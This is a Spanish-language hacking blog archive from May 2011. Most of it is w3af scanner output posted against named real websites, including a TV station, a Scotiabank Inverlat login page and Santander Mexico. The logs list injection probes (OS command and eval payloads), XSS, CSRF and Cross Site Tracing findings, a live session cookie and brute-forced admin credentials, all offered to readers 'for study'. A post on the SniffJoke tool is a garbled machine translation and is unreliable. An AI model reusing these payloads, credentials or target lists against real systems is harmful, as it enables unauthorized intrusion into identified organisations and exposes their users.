Mundo Libre: mayo 2011

lunes, 30 de mayo de 2011

script en http://www.tv3puebla.com/esmas/

Saludos Mundo Libre.

He aqui una vulnerabilidad en http://www.tv3puebla.com/esmas/

http://www.tv3puebla.com/esmas/

[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.collectCookies
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.error500
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.getMails
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.lang
[Mon 30 May 2011 11:51:02 AM CDT] The page language is: es
[Mon 30 May 2011 11:51:03 AM CDT] The server header for the remote web server is: "Apache/2.2.3 (Red Hat)". This information was found in the request with id 83.
[Mon 30 May 2011 11:52:53 AM CDT] The URL: "http://www.tv3puebla.com/esmas/" has the following DAV methods enabled:
[Mon 30 May 2011 11:52:53 AM CDT] - *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL
[Mon 30 May 2011 11:52:53 AM CDT] Starting formAuthBrute plugin execution.
[Mon 30 May 2011 11:52:53 AM CDT] Starting basicAuthBrute plugin execution.
[Mon 30 May 2011 11:52:53 AM CDT] Found 2 URLs and 2 different points of injection.
[Mon 30 May 2011 11:52:53 AM CDT] The list of URLs is:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas/
[Mon 30 May 2011 11:52:53 AM CDT] The list of fuzzable requests is:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas | Method: GET | Parameters: (s="Buscar...")
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas/ | Method: GET
[Mon 30 May 2011 11:52:53 AM CDT] The web application sent a persistent cookie.
[Mon 30 May 2011 11:52:53 AM CDT] The following scripts are vulnerable to a trivial form of XSRF:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas
[Mon 30 May 2011 11:53:15 AM CDT] The URL: http://www.tv3puebla.com/esmas is vulnerable to cross site request forgery.
[Mon 30 May 2011 11:53:15 AM CDT] The server header for the remote web server is: "Apache/2.2.3 (Red Hat)". This information was found in the request with id 83.
[Mon 30 May 2011 11:53:15 AM CDT] The URL "http://www.tv3puebla.com/esmas/" has the following allowed methods, which include DAV methods: *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL.
[Mon 30 May 2011 11:53:15 AM CDT] The URL: "http://www.tv3puebla.com/esmas" sent the cookie: "bb2_screener_=1306774395+189.131.40.162; path=/esmas/". This information was found in the request with id 138.
[Mon 30 May 2011 11:53:33 AM CDT] A possible ReDoS was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21". . Please review manually. This information was found in the request with id 206.
[Mon 30 May 2011 11:54:40 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:40 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:40 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:41 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:43 AM CDT] A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=ping+-c+9+localhost".Please review manually. This information was found in the request with id 227.
[Mon 30 May 2011 11:55:18 AM CDT] eval() input injection was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=sleep(9)%3B". . Please review manually. This information was found in the request with id 330.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:46 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:46 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:54 AM CDT] Cross Site Scripting was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 371.
[Mon 30 May 2011 11:55:54 AM CDT] The web server at "http://www.tv3puebla.com/esmas/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 393.
[Mon 30 May 2011 11:57:03 AM CDT] Password profiling TOP 100:
[Mon 30 May 2011 11:57:03 AM CDT] - [1] Puebla with 910 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [2] Noticias with 684 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [3] Diario with 657 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [4] Clima with 450 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [5] Twitter with 367 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [6] Salud with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [7] Especiales with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [8] Deportes with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [9] Infantiles with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [10] Cocina with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [11] Espacio with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [12] minutes with 339 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [13] Espect with 234 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [14] Inicio with 234 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [15] culos with 234 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [16] Buscar with 212 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [17] como with 171 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [18] ireriherrera with 166 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [19] Acuerdo with 166 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [20] Legislativo with 166 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [21] Ignacio with 166 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [22] TV3Puebla with 147 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [23] patrullas with 128 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [24] seguridad with 127 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [25] presuntos with 120 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [26] Sapos with 119 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [27] Detenidos with 118 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [28] onda with 118 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [29] calor with 118 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [30] golpeadores with 118 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [31] Powered with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [32] Sunrise with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [33] ONVOS with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [34] Principio with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [35] KoffyMedia with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [36] Sunset with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [37] High with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [38] Programaci with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [39] Refuerzan with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [40] Regresar with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [41] Versi with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [42] entrega with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [43] Wind with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [44] Contacto with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [45] esta with 110 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [46] Piedad with 109 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [47] General with 109 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [48] Acalorada with 109 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [49] Recientes with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [50] Musicales with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [51] Home with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [52] Usted with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [53] Busqueda with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [54] Entretenimiento with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [55] Publicidad with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [56] Categorias with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [57] Elegir with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [58] sentimos with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [59] ningun with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [60] resultado with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [61] busqueda with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [62] arrojo with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [63] interior with 84 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [64] identificado with 84 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [65] programa with 84 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [66] carriles with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [67] minutos with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [68] califica with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [69] Diagonal with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [70] Defensores with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [71] Tello with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [72] hour with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [73] Mejora with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [74] ambos with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [75] especial with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [76] Gobernador with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [77] Firman with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [78] Miguel with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [79] Congreso with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [80] Hallazgo with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [81] Mausoleo with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [82] RafaGobernador with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [83] sentidos with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [84] barranca with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [85] unos with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [86] Zaragoza with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [87] Calzada with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [88] Aparatoso with 52 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [89] ebriedad with 52 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [90] estado with 52 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [91] accidente with 52 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [92] chofer with 51 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [93] Deje with 30 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [94] Escrito with 30 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [95] Comentario with 30 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [96] Tagged with 27 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [97] with with 27 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [98] this with 25 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [99] refresh with 25 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [100] Please with 25 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] The URL: "http://www.tv3puebla.com/esmas" sent these cookies:
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774453+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774590+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] The URL: "http://www.tv3puebla.com/esmas/" sent these cookies:
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774294+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] Finished scanning process.

xsrf:get_xsrf Cross site request forgery vulnerability

The URL: http://www.tv3puebla.com/esmas is vulnerable to cross site request forgery.

osCommanding:Possible OS commanding vulneravility

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=ping+-c+9+localhost".Please review manually. This information was found in the request with id 227.

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=%26%26/usr/sbin/ping+-s+localhost+1000+10+".Please review manually. This information was found in the request with id 237.

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=%7Cping+-n+3+localhost".Please review manually. This information was found in the request with id 241.

xss:xss:Cross site scipting vulnerability

Cross Site Scripting was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 371.

xst:xst:Cross site tracing vulnerability.

The web server at "http://www.tv3puebla.com/esmas/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 393.

Hay se las dejo Saludos Mundo Libre.

Sniffjoke

Saludos Mundo Libre.

¿que es SniffJoke?

Un cliente de Internet ejecuta SniffJoke inyecta en el flujo de transmisión de algunos paquetes pueden perturbar seriamente el análisis de pasivos como olfateando, la interceptación y el robo de bajo nivel de información. No hay ningún servidor apoyos necesarios!

¿Por qué es esto posible?
Los protocolos de Internet se han desarrollado para permitir que dos elementos de comunicación, no una tercera parte de interceptar su comunicación. Esto ocurrirá, pero el sistema de comunicación no se ha desarrollado con este objetivo.
SniffJoke utiliza el protocolo de red de una manera permitirá, aprovechando la diferencia implícita de la pila de red actual en un aspecto del sistema operativo del disector de sniffers.
mapa del sitio

conceptos, objetivos, introducción de datos
por qué y cómo configurar una ubicación
plugins especificaciones
Hacks: cómo engañar a un disector
Scramble: ¡haga un sniffers desincronización
Sj @ twitter

¿Por qué ha sido desarrollado?

Debido a que muchas personas creen que la única forma de obtener seguridad en si mismo es a través del control, no quiero decirles que están equivocados, pero el control de Internet es impossibile, si no quieren ser controlados. Es obvio que usted no debe confiar en un control de seguridad que podrían ser anuladas, ¿no?
Al entender esto, recuerde que la aceptación progresiva de la medida de control ha sido tratado como un "sacrificio necesario". cuando te das cuenta que este método de seguridad no restablece la seguridad, pero sólo los abusos possibile, usted estará listo para dejar de aceptar este sacrificio inútil.

¿Cuál es SniffJoke no protegen de

Si está utilizando una parte no son de confianza terceros (Facebook) no importa lo mucho que sus datos están cifrados, codificados o lo que sea: los datos están en la tienda de facebook. Sin protección y se presentó. Si utiliza una caja de troyanizada, que es lo mismo, es como tener una observadores invisible y sin peso se sientan en las piernas, transcribir todo lo que estás haciendo. SniffJoke protege de: un rastreador de la red, un sniffer en el flujo de proveedor, un sniffer en la red de destino.

Seguridad y objetivos sociales

Varios objetivos SniffJoke objetivo alcanza. seguridad de la información, no serán de control basado, casi, no en el tráfico y análisis de datos pasiva, porque la tecnología de Internet no está diseñado con esta capacidad. escuchas telefónicas no sólo es utilizado por aplicación de la ley (que tiene un montón de otras tecnologías en sus disposiciones) pasivo, la tecnología de escuchas telefónicas se ha generalizado y utilizables por todas las entidades, no por su seguridad, sino por el valor derivado de sus datos.

Instalación de su primera ubicación
hay "por qué una localidad se le pide? si va a utilizar algún tipo de incumplimiento,
utilizar la línea de comandos:

nam sniffjoke-autotest-l-d / usr / local / var / sniffjoke-n 1

sniffjoke-autotest llevará a cabo una serie de pruebas, utilizando diferentes configuraciones, va a generar los archivos requeridos por sniffjoke; sniffjoke-autotest es una secuencia de comandos (que requieren incluso otro guión, sj-iptcp-sonda)

sniffjoke - nam ubicación - en primer plano - 6 de depuración

Esto iniciará sniffjoke: comprobar si está funcionando, o si necesita algo que se fijará en el interior del archivo de configuración

Números que hablan sniffjokectl
inicio sniffjokectl

El primer comando muestra el estado, el segundo hará sniffjoke para iniciar, parar, parar, depuración son otros comandos realizables por el sniffjoktctl, actuando como un cliente va a hacer.

Errores, la alerta, los problemas

Autotest: Autotest veces salir hablando de un mal funcionamiento en red.

malformaciones: el uso de "incorrecto" lucha de plugins-enabled.conf, junto generados por sniffjoke-autotest, de hecho hará que algunos mal comportamiento. esto se debe a que no he de mi carácter un servidor Windows con pe.php; Si alguien apoya esta prueba, por favor ponte en contacto con el equipo!
.

Lo podemos descargar desde su web en :http://www.delirandom.net/sniffjoke/sniffjoke-howto-usage/

Traduccion:Dellcom1@

Saludos Mundo Libre.

viernes, 27 de mayo de 2011

Cross Site Tracing see.sbi.com.mx/invernet2000/Login.jsp

Saludos Mundo Libre.

Hay les dejo otra para su estudio.

https://see.sbi.com.mx/invernet2000/Login.jsp

[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 10:02:05 PM CDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 10:02:09 PM CDT] The page language is: es
[Thu 26 May 2011 10:02:10 PM CDT] The server header for the remote web server is: "IBM_HTTP_SERVER/1.3.19.6-PQ90262 Apache/1.3.20 (Unix)". This information was found in the request with id 15.
[Thu 26 May 2011 10:02:11 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:02:11 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:02:11 PM CDT] Found 1 URLs and 1 different points of injection.
[Thu 26 May 2011 10:02:11 PM CDT] The list of URLs is:
[Thu 26 May 2011 10:02:11 PM CDT] - https://see.sbi.com.mx/invernet2000/Login.jsp
[Thu 26 May 2011 10:02:11 PM CDT] The list of fuzzable requests is:
[Thu 26 May 2011 10:02:11 PM CDT] - https://see.sbi.com.mx/invernet2000/Login.jsp | Method: GET
[Thu 26 May 2011 10:02:11 PM CDT] The web application sent a persistent cookie.
[Thu 26 May 2011 10:02:11 PM CDT] This is the information about the SSL certificate used in the target site:
- Digest (SHA-1): F1:D9:65:32:E0:B3:92:49:1F:F8:82:4C:0C:83:1D:F7:6D:40:47:E6
- Digest (MD5): 1E:39:62:29:82:A3:A6:61:A6:BA:E1:23:87:FB:97:68
- Serial#: 52710929251855116405284257897386420621
- Version: 2
- Expired: No
- Subject:
- Issuer:
- PKey bits: 1024
- PKey type: RSA (6)
- Certificate dump:
-----BEGIN CERTIFICATE-----
MIIEuzCCBCSgAwIBAgIQJ6fBddWk0elq5ABYVwUpjTANBgkqhkiG9w0BAQUFADCB
ujEfMB0GA1UEChMWVmVyaVNpZ24gVHJ1c3QgTmV0d29yazEXMBUGA1UECxMOVmVy
aVNpZ24sIEluYy4xMzAxBgNVBAsTKlZlcmlTaWduIEludGVybmF0aW9uYWwgU2Vy
dmVyIENBIC0gQ2xhc3MgMzFJMEcGA1UECxNAd3d3LnZlcmlzaWduLmNvbS9DUFMg
SW5jb3JwLmJ5IFJlZi4gTElBQklMSVRZIExURC4oYyk5NyBWZXJpU2lnbjAeFw0w
OTA2MTAwMDAwMDBaFw0xMTA3MTAyMzU5NTlaMIHLMQswCQYDVQQGEwJNWDELMAkG
A1UECBMCREYxDzANBgNVBAcUBk1leGljbzEtMCsGA1UEChQkR3J1cG8gRmluYW5j
aWVybyBTY290aWFiYW5rIEludmVybGF0MSEwHwYDVQQLFBhEZXBhcnRhbWVudG8g
U2VndXJpZGFkIDUxMzAxBgNVBAsUKlRlcm1zIG9mIHVzZSBhdCB3d3cudmVyaXNp
Z24uY29tL3JwYSAoYykwNTEXMBUGA1UEAxQOc2VlLnNiaS5jb20ubXgwgZ8wDQYJ
KoZIhvcNAQEBBQADgY0AMIGJAoGBALPKfWK9E33CLYsQZJ9qreBlMj6r490j+BQO
FAOa4mhXWWRE2cQCVs/PEtUZYgH0eeMJ/Fveez+nEYMlZZIPiDm8lvsYNCrl/n2k
QOtJbTKaXMseEmUZpdtyALaGEIYlqabfbPFzxHAalAkL+AET37lCFay5MX6E3O8E
YSdgLc41AgMBAAGjggGtMIIBqTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIFoDBEBgNV
HSAEPTA7MDkGC2CGSAGG+EUBBxcDMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3
LnZlcmlzaWduLmNvbS9ycGEwPAYDVR0fBDUwMzAxoC+gLYYraHR0cDovL1NWUklu
dGwtY3JsLnZlcmlzaWduLmNvbS9TVlJJbnRsLmNybDAoBgNVHSUEITAfBggrBgEF
BQcDAQYIKwYBBQUHAwIGCWCGSAGG+EIEATBxBggrBgEFBQcBAQRlMGMwJAYIKwYB
BQUHMAGGGGh0dHA6Ly9vY3NwLnZlcmlzaWduLmNvbTA7BggrBgEFBQcwAoYvaHR0
cDovL1NWUkludGwtYWlhLnZlcmlzaWduLmNvbS9TVlJJbnRsLWFpYS5jZXIwbgYI
KwYBBQUHAQwEYjBgoV6gXDBaMFgwVhYJaW1hZ2UvZ2lmMCEwHzAHBgUrDgMCGgQU
S2u5KJYGDLvQUjibKaxLB4shBRgwJhYkaHR0cDovL2xvZ28udmVyaXNpZ24uY29t
L3ZzbG9nbzEuZ2lmMA0GCSqGSIb3DQEBBQUAA4GBAK5kt0ugt0Bkin8hXOOjvFNS
ZJ2eKddx8EXR/fHjwUqjgZveUQcXy/k6aEz/pUcbkxOJS2BGkTUO31CAZqbEgzGG
HB9jtKOeeRbUUOoSaSLJeL9zy1H76Kys9bJHjks1QCa2QP5W6ZznSNLxNiAxJgBt
nCBtj2gHl4oszTB/quS4
-----END CERTIFICATE-----

[Thu 26 May 2011 10:02:12 PM CDT] The server header for the remote web server is: "IBM_HTTP_SERVER/1.3.19.6-PQ90262 Apache/1.3.20 (Unix)". This information was found in the request with id 15.
[Thu 26 May 2011 10:02:12 PM CDT] The URL "https://see.sbi.com.mx/invernet2000/" has the following allowed methods: GET, HEAD, OPTIONS, POST, TRACE. This information was found in the request with id 17.
[Thu 26 May 2011 10:02:12 PM CDT] The URL: "https://see.sbi.com.mx/invernet2000/Login.jsp" sent the cookie: "JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;Path=/". This information was found in the request with id 1.
[Thu 26 May 2011 10:03:26 PM CDT] Too many retries (2) while requesting: https://see.sbi.com.mx/invernet2000/
[Thu 26 May 2011 10:03:28 PM CDT] The web server at "https://see.sbi.com.mx/invernet2000/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 40.
[Thu 26 May 2011 10:03:30 PM CDT] The URL: "https://see.sbi.com.mx/invernet2000/Login.jsp" sent these cookies:
[Thu 26 May 2011 10:03:30 PM CDT] - JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3; Path=/
[Thu 26 May 2011 10:03:30 PM CDT] - JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;Path=/
[Thu 26 May 2011 10:03:30 PM CDT] Finished scanning process.

xst=xst

The web server at "https://see.sbi.com.mx/invernet2000/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 40

TRACE https://see.sbi.com.mx/invernet2000/ HTTP/1.1
Host: see.sbi.com.mx
Cookie: Path=/; JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net

Saludos Mundo Libre.

jueves, 26 de mayo de 2011

Santander Vulnerable

Saludos Mundo Libre

He aqui otra.

[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 10:05:46 PM CDT] The page language is: es
[Thu 26 May 2011 10:05:46 PM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 48.
[Thu 26 May 2011 10:05:47 PM CDT] The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication. The realm is: "Basic realm="Sun ONE Web Server"". This information was found in the request with id 53.
[Thu 26 May 2011 10:05:56 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:05:56 PM CDT] http://www.santander.com.mx/NuevaVersion/index.html is a registration form.
[Thu 26 May 2011 10:05:56 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:05:56 PM CDT] Starting basic authentication bruteforce on URL: "http://www.santander.com.mx/NuevaVersion/".
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 103.
